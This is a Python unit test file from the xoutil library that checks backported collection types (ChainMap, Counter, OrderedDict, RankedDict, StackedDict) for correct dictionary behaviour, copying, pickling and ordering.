"b0ff45c5d239a387607fe5f6b32968cf6c6e249f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47407, "license_type": "no_license", "max_line_length": 80, "num_lines": 1328, "path": "/tests/test_collections.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport sys\nimport unittest\n\nfrom random import shuffle\nfrom xoutil.future.collections import defaultdict\n\n\nclass TestCollections(unittest.TestCase):\n def test_defaultdict(self):\n d = defaultdict(lambda key, _: \"a\")\n self.assertEqual(\"a\", d[\"abc\"])\n d[\"abc\"] = 1\n self.assertEqual(1, d[\"abc\"])\n\n def test_defaultdict_clone(self):\n d = defaultdict(lambda key, d: d[\"a\"], {\"a\": \"default\"})\n self.assertEqual(\"default\", d[\"abc\"])\n\n d = defaultdict(lambda key, d: d[key])\n with self.assertRaises(KeyError):\n d[\"abc\"]\n\n\ndef test_stacked_dict_with_newpop():\n \"\"\"Test that stacked.pop has the same semantics has dict.pop.\"\"\"\n from xoutil.future.collections import StackedDict\n\n sd = StackedDict(a=\"level-0\", b=1)\n assert sd.pop(\"a\") == \"level-0\"\n assert sd.pop(\"non\", sd) is sd\n try:\n sd.pop(\"non\")\n except KeyError:\n pass\n else:\n assert False, \"Should have raised a KeyError\"\n\n\ndef test_stacked_dict():\n from xoutil.future.collections import StackedDict\n\n sd = StackedDict(a=\"level-0\")\n assert sd.peek() == dict(a=\"level-0\")\n sd.push_level(a=1, b=2, c=10)\n assert sd.level == 1\n assert sd.peek() == dict(a=1, b=2, c=10)\n sd.push_level(b=4, c=5)\n assert sd.peek() == dict(b=4, c=5)\n assert sd.level == 2\n assert sd[\"b\"] == 4\n assert sd[\"a\"] == 1\n assert sd[\"c\"] == 5\n assert len(sd) == 3\n del sd[\"c\"]\n try:\n del sd[\"c\"]\n assert False, \"Should have raise KeyError\"\n except KeyError:\n pass\n except:\n assert False, \"Should have raise KeyError\"\n assert sd.pop_level() == {\"b\": 4}\n assert sd[\"b\"] == 2\n assert sd[\"a\"] == 1\n assert len(sd) == 3\n sd.pop_level()\n assert sd[\"a\"] == \"level-0\"\n try:\n sd.pop_level()\n assert False, (\n \"Level 0 cannot be poped. \" \"It should have raised a TypeError\"\n )\n except TypeError:\n pass\n except:\n assert False, (\n \"Level 0 cannot be poped. \" \"It should have raised a TypeError\"\n )\n\n\n# Backported from Python 3.3.0 standard library\nfrom xoutil.future.collections import ChainMap, Counter\nfrom xoutil.future.collections import OrderedDict, RankedDict\nfrom xoutil.future.collections import Mapping, MutableMapping\nimport copy\nimport pickle\nfrom random import randrange\n\n\ndef _items(d):\n \"For some reason in new PyPy 5.0.1 for Py 2.7.10, set order is not nice.\"\n from xoutil.versions import python_version\n\n res = d.items()\n if python_version.pypy and isinstance(res, list):\n res.sort()\n return res\n\n\nclass TestChainMap(unittest.TestCase):\n def test_basics(self):\n c = ChainMap()\n c[\"a\"] = 1\n c[\"b\"] = 2\n d = c.new_child()\n d[\"b\"] = 20\n d[\"c\"] = 30\n # check internal state\n self.assertEqual(d.maps, [{\"b\": 20, \"c\": 30}, {\"a\": 1, \"b\": 2}])\n # check items/iter/getitem\n self.assertEqual(_items(d), _items(dict(a=1, b=20, c=30)))\n # check len\n self.assertEqual(len(d), 3)\n # check contains\n for key in \"abc\":\n self.assertIn(key, d)\n # check get\n for k, v in dict(a=1, b=20, c=30, z=100).items():\n self.assertEqual(d.get(k, 100), v)\n\n # unmask a value\n del d[\"b\"]\n # check internal state\n self.assertEqual(d.maps, [{\"c\": 30}, {\"a\": 1, \"b\": 2}])\n # check items/iter/getitem\n self.assertEqual(_items(d), _items(dict(a=1, b=2, c=30)))\n # check len\n self.assertEqual(len(d), 3)\n # check contains\n for key in \"abc\":\n self.assertIn(key, d)\n # check get\n for k, v in dict(a=1, b=2, c=30, z=100).items():\n self.assertEqual(d.get(k, 100), v)\n # check repr\n self.assertIn(\n repr(d),\n [\n type(d).__name__ + \"({'c': 30}, {'a': 1, 'b': 2})\",\n type(d).__name__ + \"({'c': 30}, {'b': 2, 'a': 1})\",\n ],\n )\n\n # check shallow copies\n for e in d.copy(), copy.copy(d):\n self.assertEqual(d, e)\n self.assertEqual(d.maps, e.maps)\n self.assertIsNot(d, e)\n self.assertIsNot(d.maps[0], e.maps[0])\n for m1, m2 in zip(d.maps[1:], e.maps[1:]):\n self.assertIs(m1, m2)\n\n # check deep copies\n for e in [\n pickle.loads(pickle.dumps(d)),\n copy.deepcopy(d),\n eval(repr(d)),\n ]:\n self.assertEqual(d, e)\n self.assertEqual(d.maps, e.maps)\n self.assertIsNot(d, e)\n for m1, m2 in zip(d.maps, e.maps):\n self.assertIsNot(m1, m2, e)\n\n f = d.new_child()\n f[\"b\"] = 5\n self.assertEqual(f.maps, [{\"b\": 5}, {\"c\": 30}, {\"a\": 1, \"b\": 2}])\n # check parents\n self.assertEqual(f.parents.maps, [{\"c\": 30}, {\"a\": 1, \"b\": 2}])\n # find first in chain\n self.assertEqual(f[\"b\"], 5)\n # look beyond maps[0]\n self.assertEqual(f.parents[\"b\"], 2)\n\n def test_contructor(self):\n # no-args --> one new dict\n self.assertEqual(ChainMap().maps, [{}])\n # 1 arg --> list\n self.assertEqual(ChainMap({1: 2}).maps, [{1: 2}])\n\n def test_bool(self):\n self.assertFalse(ChainMap())\n self.assertFalse(ChainMap({}, {}))\n self.assertTrue(ChainMap({1: 2}, {}))\n self.assertTrue(ChainMap({}, {1: 2}))\n\n def test_missing(self):\n class DefaultChainMap(ChainMap):\n def __missing__(self, key):\n return 999\n\n d = DefaultChainMap(dict(a=1, b=2), dict(b=20, c=30))\n for k, v in dict(a=1, b=2, c=30, d=999).items():\n # check __getitem__ w/missing\n self.assertEqual(d[k], v)\n for k, v in dict(a=1, b=2, c=30, d=77).items():\n # check get() w/ missing\n self.assertEqual(d.get(k, 77), v)\n for k, v in dict(a=True, b=True, c=True, d=False).items():\n # check __contains__ w/missing\n self.assertEqual(k in d, v)\n self.assertEqual(d.pop(\"a\", 1001), 1, d)\n # check pop() w/missing\n self.assertEqual(d.pop(\"a\", 1002), 1002)\n # check popitem() w/missing\n self.assertEqual(d.popitem(), (\"b\", 2))\n with self.assertRaises(KeyError):\n d.popitem()\n\n def test_dict_coercion(self):\n d = ChainMap(dict(a=1, b=2), dict(b=20, c=30))\n self.assertEqual(dict(d), dict(a=1, b=2, c=30))\n self.assertEqual(dict(d.items()), dict(a=1, b=2, c=30))\n\n def test_new_child(self):\n \"Tests for changes for issue #16613.\"\n c = ChainMap()\n c[\"a\"] = 1\n c[\"b\"] = 2\n m = {\"b\": 20, \"c\": 30}\n d = c.new_child(m)\n # check internal state\n self.assertEqual(d.maps, [{\"b\": 20, \"c\": 30}, {\"a\": 1, \"b\": 2}])\n self.assertIs(m, d.maps[0])\n\n # Use a different map than a dict\n class lowerdict(dict):\n def __getitem__(self, key):\n if isinstance(key, str):\n key = key.lower()\n return dict.__getitem__(self, key)\n\n def __contains__(self, key):\n if isinstance(key, str):\n key = key.lower()\n return dict.__contains__(self, key)\n\n c = ChainMap()\n c[\"a\"] = 1\n c[\"b\"] = 2\n m = lowerdict(b=20, c=30)\n d = c.new_child(m)\n self.assertIs(m, d.maps[0])\n # check contains\n for key in \"abc\":\n self.assertIn(key, d)\n # check get\n for k, v in dict(a=1, B=20, C=30, z=100).items():\n self.assertEqual(d.get(k, 100), v)\n\n\nclass TestCounter(unittest.TestCase):\n def test_basics(self):\n c = Counter(\"abcaba\")\n self.assertEqual(c, Counter({\"a\": 3, \"b\": 2, \"c\": 1}))\n self.assertEqual(c, Counter(a=3, b=2, c=1))\n self.assertIsInstance(c, dict)\n self.assertIsInstance(c, Mapping)\n self.assertTrue(issubclass(Counter, dict))\n self.assertTrue(issubclass(Counter, Mapping))\n self.assertEqual(len(c), 3)\n self.assertEqual(sum(c.values()), 6)\n self.assertEqual(sorted(c.values()), [1, 2, 3])\n self.assertEqual(sorted(c.keys()), [\"a\", \"b\", \"c\"])\n self.assertEqual(sorted(c), [\"a\", \"b\", \"c\"])\n self.assertEqual(sorted(c.items()), [(\"a\", 3), (\"b\", 2), (\"c\", 1)])\n self.assertEqual(c[\"b\"], 2)\n self.assertEqual(c[\"z\"], 0)\n self.assertEqual(c.__contains__(\"c\"), True)\n self.assertEqual(c.__contains__(\"z\"), False)\n self.assertEqual(c.get(\"b\", 10), 2)\n self.assertEqual(c.get(\"z\", 10), 10)\n self.assertEqual(c, dict(a=3, b=2, c=1))\n self.assertEqual(repr(c), \"Counter({'a': 3, 'b': 2, 'c': 1})\")\n self.assertEqual(c.most_common(), [(\"a\", 3), (\"b\", 2), (\"c\", 1)])\n for i in range(5):\n self.assertEqual(\n c.most_common(i), [(\"a\", 3), (\"b\", 2), (\"c\", 1)][:i]\n )\n self.assertEqual(\"\".join(sorted(c.elements())), \"aaabbc\")\n c[\"a\"] += 1 # increment an existing value\n c[\"b\"] -= 2 # sub existing value to zero\n del c[\"c\"] # remove an entry\n del c[\"c\"] # make sure that del doesn't raise KeyError\n c[\"d\"] -= 2 # sub from a missing value\n c[\"e\"] = -5 # directly assign a missing value\n c[\"f\"] += 4 # add to a missing value\n self.assertEqual(c, dict(a=4, b=0, d=-2, e=-5, f=4))\n self.assertEqual(\"\".join(sorted(c.elements())), \"aaaaffff\")\n self.assertEqual(c.pop(\"f\"), 4)\n self.assertNotIn(\"f\", c)\n for i in range(3):\n elem, cnt = c.popitem()\n self.assertNotIn(elem, c)\n c.clear()\n self.assertEqual(c, {})\n self.assertEqual(repr(c), \"Counter()\")\n self.assertRaises(NotImplementedError, Counter.fromkeys, \"abc\")\n self.assertRaises(TypeError, hash, c)\n c.update(dict(a=5, b=3))\n c.update(c=1)\n c.update(Counter(\"a\" * 50 + \"b\" * 30))\n c.update() # test case with no args\n c.__init__(\"a\" * 500 + \"b\" * 300)\n c.__init__(\"cdc\")\n c.__init__()\n self.assertEqual(c, dict(a=555, b=333, c=3, d=1))\n self.assertEqual(c.setdefault(\"d\", 5), 1)\n self.assertEqual(c[\"d\"], 1)\n self.assertEqual(c.setdefault(\"e\", 5), 5)\n self.assertEqual(c[\"e\"], 5)\n\n def test_copying(self):\n # Check that counters are copyable, deepcopyable, picklable, and\n # have a repr/eval round-trip\n words = Counter(\"which witch had which witches wrist watch\".split())\n update_test = Counter()\n update_test.update(words)\n for i, dup in enumerate(\n [\n words.copy(),\n copy.copy(words),\n copy.deepcopy(words),\n pickle.loads(pickle.dumps(words, 0)),\n pickle.loads(pickle.dumps(words, 1)),\n pickle.loads(pickle.dumps(words, 2)),\n pickle.loads(pickle.dumps(words, -1)),\n eval(repr(words)),\n update_test,\n Counter(words),\n ]\n ):\n # TODO: Not used ``msg = (i, dup, words)``\n self.assertTrue(dup is not words)\n self.assertEqual(dup, words)\n self.assertEqual(len(dup), len(words))\n self.assertEqual(type(dup), type(words))\n\n def test_copy_subclass(self):\n class MyCounter(Counter):\n pass\n\n c = MyCounter(\"slartibartfast\")\n d = c.copy()\n self.assertEqual(d, c)\n self.assertEqual(len(d), len(c))\n self.assertEqual(type(d), type(c))\n\n def test_conversions(self):\n # Convert to: set, list, dict\n s = \"she sells sea shells by the sea shore\"\n self.assertEqual(sorted(Counter(s).elements()), sorted(s))\n self.assertEqual(sorted(Counter(s)), sorted(set(s)))\n self.assertEqual(dict(Counter(s)), dict(Counter(s).items()))\n self.assertEqual(set(Counter(s)), set(s))\n\n def test_invariant_for_the_in_operator(self):\n c = Counter(a=10, b=-2, c=0)\n for elem in c:\n self.assertTrue(elem in c)\n self.assertIn(elem, c)\n\n def test_multiset_operations(self):\n # Verify that adding a zero counter will strip zeros and negatives\n c = Counter(a=10, b=-2, c=0) + Counter()\n self.assertEqual(dict(c), dict(a=10))\n\n elements = \"abcd\"\n for i in range(1000):\n # test random pairs of multisets\n p = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n p.update(e=1, f=-1, g=0)\n q = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n q.update(h=1, i=-1, j=0)\n for counterop, numberop in [\n (Counter.__add__, lambda x, y: max(0, x + y)),\n (Counter.__sub__, lambda x, y: max(0, x - y)),\n (Counter.__or__, lambda x, y: max(0, x, y)),\n (Counter.__and__, lambda x, y: max(0, min(x, y))),\n ]:\n result = counterop(p, q)\n for x in elements:\n self.assertEqual(\n numberop(p[x], q[x]), result[x], (counterop, x, p, q)\n )\n # verify that results exclude non-positive counts\n self.assertTrue(x > 0 for x in result.values())\n\n elements = \"abcdef\"\n for i in range(100):\n # verify that random multisets with no repeats are exactly like\n # sets\n p = Counter(dict((elem, randrange(0, 2)) for elem in elements))\n q = Counter(dict((elem, randrange(0, 2)) for elem in elements))\n for counterop, setop in [\n (Counter.__sub__, set.__sub__),\n (Counter.__or__, set.__or__),\n (Counter.__and__, set.__and__),\n ]:\n counter_result = counterop(p, q)\n set_result = setop(set(p.elements()), set(q.elements()))\n self.assertEqual(counter_result, dict.fromkeys(set_result, 1))\n\n def test_inplace_operations(self):\n elements = \"abcd\"\n for i in range(1000):\n # test random pairs of multisets\n p = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n p.update(e=1, f=-1, g=0)\n q = Counter(dict((elem, randrange(-2, 4)) for elem in elements))\n q.update(h=1, i=-1, j=0)\n for inplace_op, regular_op in [\n (Counter.__iadd__, Counter.__add__),\n (Counter.__isub__, Counter.__sub__),\n (Counter.__ior__, Counter.__or__),\n (Counter.__iand__, Counter.__and__),\n ]:\n c = p.copy()\n c_id = id(c)\n regular_result = regular_op(c, q)\n inplace_result = inplace_op(c, q)\n self.assertEqual(inplace_result, regular_result)\n self.assertEqual(id(inplace_result), c_id)\n\n def test_subtract(self):\n c = Counter(a=-5, b=0, c=5, d=10, e=15, g=40)\n c.subtract(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50)\n self.assertEqual(\n c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50)\n )\n c = Counter(a=-5, b=0, c=5, d=10, e=15, g=40)\n c.subtract(Counter(a=1, b=2, c=-3, d=10, e=20, f=30, h=-50))\n self.assertEqual(\n c, Counter(a=-6, b=-2, c=8, d=0, e=-5, f=-30, g=40, h=50)\n )\n c = Counter(\"aaabbcd\")\n c.subtract(\"aaaabbcce\")\n self.assertEqual(c, Counter(a=-1, b=0, c=-1, d=1, e=-1))\n\n def test_unary(self):\n c = Counter(a=-5, b=0, c=5, d=10, e=15, g=40)\n self.assertEqual(dict(+c), dict(c=5, d=10, e=15, g=40))\n self.assertEqual(dict(-c), dict(a=5))\n\n def test_repr_nonsortable(self):\n c = Counter(a=2, b=None)\n r = repr(c)\n self.assertIn(\"'a': 2\", r)\n self.assertIn(\"'b': None\", r)\n\n def test_helper_function(self):\n from xoutil.future.collections import _count_elements\n\n # two paths, one for real dicts and one for other mappings\n elems = list(\"abracadabra\")\n\n d = dict()\n _count_elements(d, elems)\n self.assertEqual(d, {\"a\": 5, \"r\": 2, \"b\": 2, \"c\": 1, \"d\": 1})\n\n m = OrderedDict()\n _count_elements(m, elems)\n self.assertEqual(\n m, OrderedDict([(\"a\", 5), (\"b\", 2), (\"r\", 2), (\"c\", 1), (\"d\", 1)])\n )\n\n\nclass TestOrderedDict(unittest.TestCase):\n def test_init(self):\n with self.assertRaises(TypeError):\n # too many args\n OrderedDict([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n # dict input\n self.assertEqual(sorted(OrderedDict(dict(pairs)).items()), pairs)\n # kwds input\n self.assertEqual(sorted(OrderedDict(**dict(pairs)).items()), pairs)\n # pairs input\n self.assertEqual(list(OrderedDict(pairs).items()), pairs)\n # mixed input\n self.assertEqual(\n list(\n OrderedDict(\n [(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5\n ).items()\n ),\n pairs,\n )\n\n # Make sure that direct calls to __init__ do not clear previous\n # contents\n d = OrderedDict([(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 44), (\"e\", 55)])\n d.__init__([(\"e\", 5), (\"f\", 6)], g=7, d=4)\n self.assertEqual(\n list(d.items()),\n [\n (\"a\", 1),\n (\"b\", 2),\n (\"c\", 3),\n (\"d\", 4),\n (\"e\", 5),\n (\"f\", 6),\n (\"g\", 7),\n ],\n )\n\n def test_update(self):\n with self.assertRaises(TypeError):\n # too many args\n OrderedDict().update([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n od = OrderedDict()\n od.update(dict(pairs))\n # dict input\n self.assertEqual(sorted(od.items()), pairs)\n od = OrderedDict()\n od.update(**dict(pairs))\n # kwds input\n self.assertEqual(sorted(od.items()), pairs)\n od = OrderedDict()\n od.update(pairs)\n # pairs input\n self.assertEqual(list(od.items()), pairs)\n od = OrderedDict()\n od.update([(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5)\n # mixed input\n self.assertEqual(list(od.items()), pairs)\n\n # Issue 9137: Named argument called 'other' or 'self'\n # shouldn't be treated specially.\n od = OrderedDict()\n od.update(self=23)\n self.assertEqual(list(od.items()), [(\"self\", 23)])\n od = OrderedDict()\n od.update(other={})\n self.assertEqual(list(od.items()), [(\"other\", {})])\n od = OrderedDict()\n od.update(red=5, blue=6, other=7, self=8)\n self.assertEqual(\n sorted(list(od.items())),\n [(\"blue\", 6), (\"other\", 7), (\"red\", 5), (\"self\", 8)],\n )\n\n # Make sure that direct calls to update do not clear previous contents\n # add that updates items are not moved to the end\n d = OrderedDict([(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 44), (\"e\", 55)])\n d.update([(\"e\", 5), (\"f\", 6)], g=7, d=4)\n self.assertEqual(\n list(d.items()),\n [\n (\"a\", 1),\n (\"b\", 2),\n (\"c\", 3),\n (\"d\", 4),\n (\"e\", 5),\n (\"f\", 6),\n (\"g\", 7),\n ],\n )\n\n def test_abc(self):\n self.assertIsInstance(OrderedDict(), MutableMapping)\n self.assertTrue(issubclass(OrderedDict, MutableMapping))\n\n def test_clear(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n self.assertEqual(len(od), len(pairs))\n od.clear()\n self.assertEqual(len(od), 0)\n\n def test_delitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n del od[\"a\"]\n self.assertNotIn(\"a\", od)\n with self.assertRaises(KeyError):\n del od[\"a\"]\n self.assertEqual(list(od.items()), pairs[:2] + pairs[3:])\n\n def test_setitem(self):\n od = OrderedDict([(\"d\", 1), (\"b\", 2), (\"c\", 3), (\"a\", 4), (\"e\", 5)])\n od[\"c\"] = 10 # existing element\n od[\"f\"] = 20 # new element\n self.assertEqual(\n list(od.items()),\n [(\"d\", 1), (\"b\", 2), (\"c\", 10), (\"a\", 4), (\"e\", 5), (\"f\", 20)],\n )\n\n def test_iterators(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n self.assertEqual(list(od), [t[0] for t in pairs])\n self.assertEqual(list(od.keys()), [t[0] for t in pairs])\n self.assertEqual(list(od.values()), [t[1] for t in pairs])\n self.assertEqual(list(od.items()), pairs)\n self.assertEqual(list(reversed(od)), [t[0] for t in reversed(pairs)])\n\n def test_popitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n while pairs:\n self.assertEqual(od.popitem(), pairs.pop())\n with self.assertRaises(KeyError):\n od.popitem()\n self.assertEqual(len(od), 0)\n\n def test_pop(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n shuffle(pairs)\n while pairs:\n k, v = pairs.pop()\n self.assertEqual(od.pop(k), v)\n with self.assertRaises(KeyError):\n od.pop(\"xyz\")\n self.assertEqual(len(od), 0)\n self.assertEqual(od.pop(k, 12345), 12345)\n\n # make sure pop still works when __missing__ is defined\n class Missing(OrderedDict):\n def __missing__(self, key):\n return 0\n\n m = Missing(a=1)\n self.assertEqual(m.pop(\"b\", 5), 5)\n self.assertEqual(m.pop(\"a\", 6), 1)\n self.assertEqual(m.pop(\"a\", 6), 6)\n with self.assertRaises(KeyError):\n m.pop(\"a\")\n\n def test_equality(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od1 = OrderedDict(pairs)\n od2 = OrderedDict(pairs)\n # same order implies equality\n self.assertEqual(od1, od2)\n pairs = pairs[2:] + pairs[:2]\n od2 = OrderedDict(pairs)\n # different order implies inequality\n self.assertNotEqual(od1, od2)\n # comparison to regular dict is not order sensitive\n self.assertEqual(od1, dict(od2))\n self.assertEqual(dict(od2), od1)\n # different length implied inequality\n self.assertNotEqual(od1, OrderedDict(pairs[:-1]))\n\n def test_copying(self):\n # Check that ordered dicts are copyable, deepcopyable, picklable,\n # and have a repr/eval round-trip\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n update_test = OrderedDict()\n update_test.update(od)\n for i, dup in enumerate(\n [\n od.copy(),\n copy.copy(od),\n copy.deepcopy(od),\n pickle.loads(pickle.dumps(od, 0)),\n pickle.loads(pickle.dumps(od, 1)),\n pickle.loads(pickle.dumps(od, 2)),\n pickle.loads(pickle.dumps(od, -1)),\n eval(repr(od)),\n update_test,\n OrderedDict(od),\n ]\n ):\n self.assertTrue(dup is not od)\n self.assertEqual(dup, od)\n self.assertEqual(list(dup.items()), list(od.items()))\n self.assertEqual(len(dup), len(od))\n self.assertEqual(type(dup), type(od))\n\n def test_yaml_linkage(self):\n # Verify that __reduce__ is setup in a way that supports PyYAML's\n # dump() feature.\n # In yaml, lists are native but tuples are not.\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n # yaml.dump(od) -->\n # '!!python/object/apply:__main__.OrderedDict\\n- - [a, 1]\\n - [b, 2]\\n'\n self.assertTrue(\n all(type(pair) == list for pair in od.__reduce__()[1])\n )\n\n def test_reduce_not_too_fat(self):\n import sys\n\n # do not save instance dictionary if not needed\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = OrderedDict(pairs)\n self.assertIsNone(od.__reduce__()[2])\n od.x = 10\n self.assertIsNotNone(od.__reduce__()[2])\n\n def test_repr(self):\n od = OrderedDict([(\"c\", 1), (\"b\", 2), (\"a\", 3)])\n self.assertEqual(\n repr(od), \"OrderedDict([('c', 1), ('b', 2), ('a', 3)])\"\n )\n self.assertEqual(eval(repr(od)), od)\n self.assertEqual(repr(OrderedDict()), \"OrderedDict()\")\n\n def test_repr_recursive(self):\n # See issue #9826\n od = OrderedDict.fromkeys(\"abc\")\n od[\"x\"] = od\n self.assertEqual(\n repr(od),\n (\n \"OrderedDict([('a', None), ('b', None), \"\n \"('c', None), ('x', ...)])\"\n ),\n )\n\n def test_setdefault(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = OrderedDict(pairs)\n pair_order = list(od.items())\n self.assertEqual(od.setdefault(\"a\", 10), 3)\n # make sure order didn't change\n self.assertEqual(list(od.items()), pair_order)\n self.assertEqual(od.setdefault(\"x\", 10), 10)\n # make sure 'x' is added to the end\n self.assertEqual(list(od.items())[-1], (\"x\", 10))\n\n # make sure setdefault still works when __missing__ is defined\n class Missing(OrderedDict):\n def __missing__(self, key):\n return 0\n\n self.assertEqual(Missing().setdefault(5, 9), 9)\n\n def test_reinsert(self):\n # Given insert a, insert b, delete a, re-insert a,\n # verify that a is now later than b.\n od = OrderedDict()\n od[\"a\"] = 1\n od[\"b\"] = 2\n del od[\"a\"]\n od[\"a\"] = 1\n self.assertEqual(list(od.items()), [(\"b\", 2), (\"a\", 1)])\n\n def test_move_to_end(self):\n od = OrderedDict.fromkeys(\"abcde\")\n self.assertEqual(list(od), list(\"abcde\"))\n od.move_to_end(\"c\")\n self.assertEqual(list(od), list(\"abdec\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"e\")\n self.assertEqual(list(od), list(\"cabde\"))\n with self.assertRaises(KeyError):\n od.move_to_end(\"x\")\n\n @unittest.skipIf(\"PyPy\" in sys.version, \"sys.getsizeof not supported\")\n def test_sizeof(self):\n # Wimpy test: Just verify the reported size is larger than a regular\n # dict\n d = dict(a=1)\n od = OrderedDict(**d)\n self.assertGreater(sys.getsizeof(od), sys.getsizeof(d))\n\n def test_override_update(self):\n # Verify that subclasses can override update() without breaking\n # __init__()\n class MyOD(OrderedDict):\n def update(self, *args, **kwds):\n raise Exception()\n\n items = [(\"a\", 1), (\"c\", 3), (\"b\", 2)]\n self.assertEqual(list(MyOD(items).items()), items)\n\n\nclass TestRankedDict(unittest.TestCase):\n def test_init(self):\n with self.assertRaises(TypeError):\n # too many args\n RankedDict([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n # dict input\n self.assertEqual(sorted(RankedDict(dict(pairs)).items()), pairs)\n # kwds input\n self.assertEqual(sorted(RankedDict(**dict(pairs)).items()), pairs)\n # pairs input\n self.assertEqual(list(RankedDict(pairs).items()), pairs)\n # mixed input\n self.assertNotEqual(\n list(\n RankedDict(\n [(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5\n ).items()\n ),\n pairs,\n )\n\n # Make sure that direct calls to __init__ do not clear previous\n # contents\n d = RankedDict([(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 44), (\"e\", 55)])\n d.__init__([(\"f\", 6), (\"e\", 5)], d=4)\n self.assertEqual(\n list(d.items()),\n [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"f\", 6), (\"e\", 5), (\"d\", 4)],\n )\n\n def test_update(self):\n with self.assertRaises(TypeError):\n # too many args\n RankedDict().update([(\"a\", 1), (\"b\", 2)], None)\n pairs = [(\"a\", 1), (\"b\", 2), (\"c\", 3), (\"d\", 4), (\"e\", 5)]\n od = RankedDict()\n od.update(dict(pairs))\n # dict input\n self.assertEqual(sorted(od.items()), pairs)\n od = RankedDict()\n od.update(**dict(pairs))\n # kwds input\n self.assertEqual(sorted(od.items()), pairs)\n od = RankedDict()\n od.update(pairs)\n # pairs input\n self.assertEqual(list(od.items()), pairs)\n od = RankedDict()\n od.update([(\"a\", 1), (\"b\", 2), (\"c\", 9), (\"d\", 4)], c=3, e=5)\n # mixed input\n self.assertNotEqual(list(od.items()), pairs)\n\n # Issue 9137: Named argument called 'other' or 'self'\n # shouldn't be treated specially.\n od = RankedDict()\n od.update(self=23)\n self.assertEqual(list(od.items()), [(\"self\", 23)])\n od = RankedDict()\n od.update(other={})\n self.assertEqual(list(od.items()), [(\"other\", {})])\n od = RankedDict()\n od.update(red=5, blue=6, other=7, self=8)\n self.assertEqual(\n sorted(list(od.items())),\n [(\"blue\", 6), (\"other\", 7), (\"red\", 5), (\"self\", 8)],\n )\n\n def test_abc(self):\n self.assertIsInstance(RankedDict(), MutableMapping)\n self.assertTrue(issubclass(RankedDict, MutableMapping))\n\n def test_clear(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n self.assertEqual(len(od), len(pairs))\n od.clear()\n self.assertEqual(len(od), 0)\n\n def test_delitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = RankedDict(pairs)\n del od[\"a\"]\n self.assertNotIn(\"a\", od)\n with self.assertRaises(KeyError):\n del od[\"a\"]\n self.assertEqual(list(od.items()), pairs[:2] + pairs[3:])\n\n def test_setitem(self):\n od = RankedDict([(\"d\", 1), (\"b\", 2), (\"c\", 3), (\"a\", 4), (\"e\", 5)])\n od[\"c\"] = 10 # existing element\n od[\"f\"] = 20 # new element\n self.assertEqual(\n list(od.items()),\n [(\"d\", 1), (\"b\", 2), (\"a\", 4), (\"e\", 5), (\"c\", 10), (\"f\", 20)],\n )\n\n def test_iterators(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n self.assertEqual(list(od), [t[0] for t in pairs])\n self.assertEqual(list(od.keys()), [t[0] for t in pairs])\n self.assertEqual(list(od.values()), [t[1] for t in pairs])\n self.assertEqual(list(od.items()), pairs)\n 